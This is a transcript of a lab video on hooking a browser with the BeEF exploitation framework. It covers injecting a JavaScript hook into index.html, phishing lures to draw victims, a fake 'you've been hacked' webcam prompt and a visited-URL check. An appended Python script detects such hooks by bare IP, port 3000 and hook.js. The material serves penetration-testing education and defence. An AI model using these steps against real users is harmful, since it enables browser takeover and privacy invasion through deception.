Greetings. In this short video presentation, we're going to take a look at how we go about conducting a client-side attack using the Browser Exploitation Framework, commonly referred to as BeEF. BeEF is short for Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system and examines exploitability within the context of the one true open door, the web browser. BeEF will hook one or more web browsers and use them as a beachhead for launching directed command modules and further attacks against the system from within the browser context. For this lab demonstration, I'll be using one virtual install of Kali 2.0 that's been updated and upgraded to the latest and the greatest, running the Apache web server, and one Windows operating system with a fresh install of the Firefox ESR browser. Now, you are free to use any version of Windows and browser that you see fit.
But your results will differ depending on the security and how new and updated both are. Since BeEF comes preinstalled with the latest version of Kali, there's nothing for us to download and install. We can launch the application a number of ways, but the two most common are using the Applications menu, where we can go to Exploitation Tools and launch it from within there, or using the Kali quick launch, where we can launch it using the BeEF icon, and that will open up the BeEF exploitation framework. For this demonstration, I'm just going to use the shortcut that's in place inside of the quick launch bar. I'm going to go ahead and just click it. This is going to open up the BeEF services inside of the terminal.
Give it a chance to open up, and when it comes back to the prompt, that means that the services for BeEF have been started. It is important that we read and understand everything that pops up inside of a terminal when we launch a service, because this is going to be our indicator of whether or not the service started correctly and everything is working as it should. The same applies to BeEF. So we know that the BeEF services have started, and now we have a couple of lines in here that we need to pay particular attention to. The first line we want to pay attention to is where it says UI URL. This is the web page for the login to access the BeEF management console.
So we can go ahead and take another look at this. It's telling you that to get to the BeEF logon page, you would use the loopback address and port 3000, /ui/panel. And if we open up our browser, we see that this is the case. The term hooking is used throughout this tutorial. Hooking is the process of convincing our victim to click on a link that contains the JavaScript hook file. This JavaScript file will be processed by the victim's browser, tying the remote browser back to the BeEF server. This is what is meant by the hooking process.
And if we look at our terminal, we see that the hook, the script that is going to allow the remote browser to hook back to our BeEF server, is given to us here. We have a couple of things here we're going to have to modify, and one of those is going to be the IP address. This is the IP address of our BeEF server, or our Kali server, or our Apache web server. They're all the same address, but we have to modify this address in here. This little item here that has the IP between the brackets has to be replaced with the actual IP address of the machine. So the next thing we want to do is discover what our actual IP address is for the BeEF server.
So to do this, we're just going to go up to our terminal, we're going to right-click, and we're going to say Open New Window. Inside this new window, we're going to type in ifconfig. I am concerned with the IP address that is currently assigned to my eth0, and this is listed under inet. We can see that I'm currently assigned the IP address of 192 dot 168 dot 145 dot one query.
Now, I need to remember this, because I'm going to use it later on to modify the path to the script, and that's the IP address that's going to go in here. If you launch the BeEF user interface and you do not see this logon screen, that means that your Firefox browser needs to be updated, and you're going to use apt-get upgrade firefox; that is our command to go ahead and get the latest version of Firefox ESR. Now that we have the IP address, we can go ahead and take the next step, which is starting the Apache web server. To do this, using the same terminal where we launched our BeEF framework, I have typed service apache2 start, and I'm going to go ahead and just hit Enter. If it comes back to the command prompt, we know that the service started successfully.
BeEF ties itself in with the Apache web service on our Kali machine, and it uses the default index.html file. So we're going to have to go find this index.html file and we're going to modify it. We're going to change some text and we're going to put in the path for the hook. And we're going to try to entice our victim to visit this website so that they complete the hooking process and connect their browser back to our BeEF server. To get to the index.html file, we begin by going to the Files icon inside of our quick launch.
Once this opens up, we're going to go down to Other Locations. Next, we're going to click on Computer. Underneath Computer, we're going to click on the var directory. We're then going to click on the www directory. And finally, we're presented with the html directory. We'll open this up, and you'll see that we have an index.html file.
Now we have to open up this index.html file, and we're going to edit it using a text editor. To do this, I'm just going to right-click, and I'm going to say Open With Other Application. Now, you'll see that I have the Leafpad text editor available to me, but you may not. If you don't see a text editor, just go down to where it says View All Applications and choose yourself a text editor. I'm gonna go ahead and say Select, and this opens up the index.html file. Now, what you're going to see is a lot different from what we see here.
What you can do here is modify the HTML inside of the document, leaving this part: the html tag at the top, the opening head tag, and the title. You can modify it with what you see here on the screen. This text, all of it, is also available inside of the lab file; you can just copy it and paste it into this index.html file from the lab file. Now, you'll notice that script; we're going to modify this here just a little bit. I'm gonna make this small and bring up my terminal screen over here so you can see what I've done. So this is the script that I need to put between the two head tags; the beginning and the closing tags need to have this script in between.
So I'm going to go back over here, and we're going to open this up again. And you'll see where, inside the script, I took the IP in the brackets and replaced it with the IP address of my server. This is the IP address that I discovered. Now, your IP address is going to be different, so do not use this IP address; you have to discover your own IP address for your Apache web server, so that the client will know where to send the request for this JavaScript code. Once you have the HTML correct inside of this index.html file, you just go up to File, and then you can just select Save, and it'll close. We're now ready to proceed with the actual hooking of the client's browser back to our BeEF server.
For this next step, we're going to need to log on to the BeEF management console. So I'm going to bring that back up real quick. And we're going to log on with the username of beef and the password of beef, all lowercase. Again, the username and the password for the BeEF management console login, or the authentication, are the same: beef, all lowercase. I'm gonna go ahead and log in.
Now, it's very important that you read this Getting Started page. There's a lot of good information in here, and it's going to explain a lot of good stuff to you. As you see, I've already been playing around with BeEF, and I already have one machine that I have hooked into my BeEF management console. What I'm going to do here is go ahead and just open this up real quick.
And we're going to look at the commands. I'm going to go down, and I'm going to remove the hook element, or, I'm gonna say, unhook. To do this, I'm going to say Execute. And now my BeEF management console is going to go out and find my Windows 7 machine, and it should remove the hook that it established earlier with the Firefox browser. So we're going to go ahead and open up my browser here, and we're going to begin launching this BeEF hooking process and see how it actually works.
So we're now back at my BeEF management console. And what we have here is a completely clean interface with no hooked browsers. So I'm gonna go back to my Windows 7 machine here. And let's see if I can pull this down and get over to the address. Yes, there it is. How I get the client to launch the web page where this JavaScript is hosted is up to my creativity. Normally, it would be some type of social engineering attempt, a phishing email, or whatever the process is.
If you watched the video on how to exploit using Kali across the WAN, then you'll see that for us to make this actually work, we would have to have port forwarding enabled on our network. Now, port forwarding was explained in that first video, so make sure you watch that so you'll understand better how this actually works in the real world. For this demonstration, we're just doing this on my local area network, with my two machines seeing each other. So I'm gonna go ahead and select the web server that is hosting my BeEF service. And it goes back. And remember the HTML file that we modified.
That index.html file is now present here inside of the remote user's browser. We injected the JavaScript code inside of the index.html document between the two head tags, the beginning and the closing, which is where the JavaScript has to be present. This machine is now infected. That's all the user had to do. All he had to do was just open up the web page. Again, how we entice the individual to get to the web page is up to our creativity.
It could be a phishing email. It could say something like, hey, look at all the great pictures I took on my vacation; I posted them up here on this website. Once the individual clicks on that URL for that website, and we have embedded that JavaScript hook, then their web browser becomes infected, and we have access to their machine. So now let's go back over and look at our Kali machine. And now we see that I do have the browser hooked back over here to my BeEF.
So now I can communicate just by clicking on the IP address of that browser, where it's located underneath the browsers. And we see the online browsers currently available to me. If I click on it, I get the first tab that's available to me, which is the Details tab. It's very important that you understand what kind of a browser you're working with. So just keep looking at and understanding all the different aspects of what's going on with this browser, because this is going to determine exactly what exploits you can launch against the browser.
Not every exploit is going to work, because every browser is different, and every browser's update is going to block certain exploits from working. Once we understand what browser it is we're playing around with, or hooked to, we can then go into the Commands tab, and we can begin the exploitation process. Now, these exploits that you're seeing here don't pertain directly to Mozilla Firefox ESR. These are all the exploits that are available up inside of BeEF. If you remember, on the Getting Started page, we have some information about which of these exploits are deemed feasible and which aren't. The ones that are given the green light are most likely to work, but they may not.
There may be something that's not being enacted correctly that's stopping the exploit from working. So don't take it as the absolute truth that the exploit will work; it may work. And the same thing down here: the command module does not work against the target, or the command module works against the target but may be visible to the user. There are a lot of things going on here that you want to understand with these different colored lights. All right, so make sure you understand that. Again, by just clicking on the IP address of our victim's browser, we can get into the tabs that give us the ability to exploit.
So we're going to click on the Commands tab now. And again, we're going to start off up here with the browser. These are all the different exploits that we can take a look at. There's not a whole lot in here that's of interest to us. The webcam, the webcam is not going to work, because we don't have Flash installed. We can still play around with it.
So I can click on this. And over here I can change the social engineering, kind of, because this is what the user is going to see; this is what's going to pop up inside the browser. So I can say something like, you've been hacked. Now, we've got to make sure that we spell everything correctly, because we don't want to look totally illiterate. So I'm going to type in the whole words here: you have been hacked. All right, then we can change this down here into something catchy, like, don't be a sore loser.
Go ahead and launch your webcam, give us some webcam action, whatever you want to type in there. Let's go ahead and fill in some text. So I'm trying to convince the opposite end of this hook, whoever it is that's reading this, to go ahead and play along and give me access to their webcam. Pretty hard to do. Not everybody's as gullible as you think they are. But I'm just playing around with it here.
So, you've been hacked. How about, how about some webcam action, blah, blah, blah. Now, down here, you can go ahead and launch the webcam exploit by just saying Execute. When I say Execute, we go back on over to my Windows 7 machine. And there's what we typed in.
So this could be something catchy, like a free ride or a free ticket or a free airplane ticket, whatever it is, and I've got to go back and check my spelling, but you get the idea. So you can be creative with this. And if you can convince the individual to go ahead and play along, then you get access to their webcam, or whatever it is you're trying to get access to. As you can see, there are a lot of different exploits available up inside of the BeEF management console. Another one that we can use as a pen tester is Get Visited URLs. So if we're wondering if the user has been visiting some type of inappropriate sites, be it porn, gaming, gambling, whatever they might be, we can check for those sites up here,
inside this particular exploit, and then we just launch it. So I can just leave beefproject.com there, and we'll see if our browser has any record of this particular URL. I'll go ahead and say Execute. Now all I have to do is come back over here to the module results history. And if I click on it, it comes back and tells me that there is no record of a URL being visited called beefproject.com.
If you would like to know if the browser is susceptible to cross-site scripting, you can go ahead and launch this tab here for the cross-site scripting rays. If you'd like to know more about the network, how we're actually connected, you can do that by going to the Network tab; it'll show you the path back to the victim. There are also the logs, which are great for troubleshooting. But mostly, you're getting the idea that this is very intuitive. So using the BeEF framework to exploit someone's browser is great, because this is the one open door that's available to us by way of the end users. When the end user opens up their browser, the machine looks at it and says, hey, you're the end user, we're not going to deny you if you want to go visit this website.
Great. We're going to go there for you. So if the end user clicks on that infected URL, and they come back over to our BeEF server, they're going to pull down that JavaScript code that's going to complete the hook. So in conclusion, it's important that you understand not only what the BeEF framework is capable of doing, but its limitations. That concludes this short video presentation on how we go about creating a hook back to a remote browser using the BeEF exploitation framework. If you have any questions or you have any concerns about the contents of this video, please don't hesitate to reach out and contact your instructor.
And I'll see you in my next video.
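
From the defender's side, the hook described in this walkthrough is just a script tag in a page's head that loads JavaScript from another host. The following is an added example, not part of the video or the BeEF project: a Python audit that flags such tags in served HTML. The allowlisted host, the sample page and its address, and BeEF's default port 3000 and default hook file name hook.js are assumptions of the example.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed values: the site's own script hosts, BeEF's default port and hook name.
ALLOWED_HOSTS = {"cdn.example.test"}
BEEF_PORT = 3000
BEEF_HOOK_NAME = "hook.js"

# Constructed sample page: two legitimate scripts plus one injected tag.
SAMPLE_PAGE = """<html><head><title>Holiday photos</title>
<script src="/js/gallery.js"></script>
<script src="https://cdn.example.test/lib.js"></script>
<script src="http://192.0.2.10:3000/hook.js"></script></head></html>"""

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []  # src attribute of every <script> tag seen
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.sources.append(src.strip())

def is_ip_literal(host):
    try:
        return bool(ipaddress.ip_address(host))
    except ValueError:
        return False

def audit_page(html):
    """Return (src, reasons) for each external script that needs review."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urlsplit(src)
        if url.hostname is None:
            continue  # relative path, served by the site itself
        checks = [
            (url.hostname not in ALLOWED_HOSTS, "host not allowlisted"),
            (is_ip_literal(url.hostname), "bare IP host"),
            (url.port == BEEF_PORT, "port 3000"),
            (url.path.rsplit("/", 1)[-1].lower() == BEEF_HOOK_NAME, "hook.js file name"),
        ]
        reasons = [label for hit, label in checks if hit]
        if reasons:
            findings.append((src, reasons))
    return findings
```

Running audit_page over every page under the web root after each deployment, and alerting on any finding, catches an index.html that has been edited the way the walkthrough describes.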